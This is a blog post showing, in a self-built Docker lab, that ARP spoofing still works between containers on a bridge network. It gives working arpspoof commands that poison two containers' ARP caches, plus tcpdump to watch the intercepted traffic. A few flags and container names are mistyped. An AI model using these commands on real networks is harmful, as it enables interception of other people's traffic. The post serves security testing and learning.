Thursday, January 26, 2017

ARP spoofing Docker containers


ARP spoofing is a relatively old hacking technique to intercept traffic on switched/bridged networks. It is essentially a mechanism to poison the ARP cache used by systems to find the MAC address of a certain host. Google searches will yield lots of information about the topic if you need further reading.

This write up is simply to validate whether the technique is still valid in containerized environments.

So let’s create a test environment to proof the point.

docker-machine create \
--driver digitalocean \
--digitalocean-access-token=d68aa…65b14e \
spooftest

Open a few terminals to make the testing easy

docker-machine ssh spooftest

On terminal 1, create the required containers
# docker build -t arpspoof - <<EOF
FROM debian
RUN apt-get update && apt-get install -y dsniff
EOF

# docker build -t tcpdump - <<EOF
FROM ubuntu
RUN apt-get update && apt-get install -y tcpdump
CMD tcpdump -i -n eth0
EOF

On terminal 2, create a busybox container named box1
# docker run -it --name box1 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:04
          inet addr:172.17.0.4  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:508 (508.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ #

On terminal 3, create a busybox container named box2
# docker run -it --name box2 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:05
          inet addr:172.17.0.5  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:418 (418.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ # ping 172.17.0.4

On terminal 1, launch the arpspoof attack
# docker run -it --name arpspoofer arpspoof
arpspoof -i eth0  -t 172.17.0.5 172.17.0.4 &
arpspoof -i eth0  -t 172.17.0.4 172.17.0.5 &

On terminal 4, launch a tcpdump to verify the arpsoof taking place
docker run -it --name tcpdumper --net=container:arpsoofer  tcpdump

Traffic should be relayed through the arpspoof container!
Posted by at
Labels: ,

1 comment:

  1. BrunoFebruary 7, 2018 at 8:29 AM

    Very interesting. (A few typo and also tcpdump -n -i ...)
    I have a SELinux alert with tcpdump, if you have an easy solution??

    ReplyDelete

Subscribe to: Post Comments (Atom)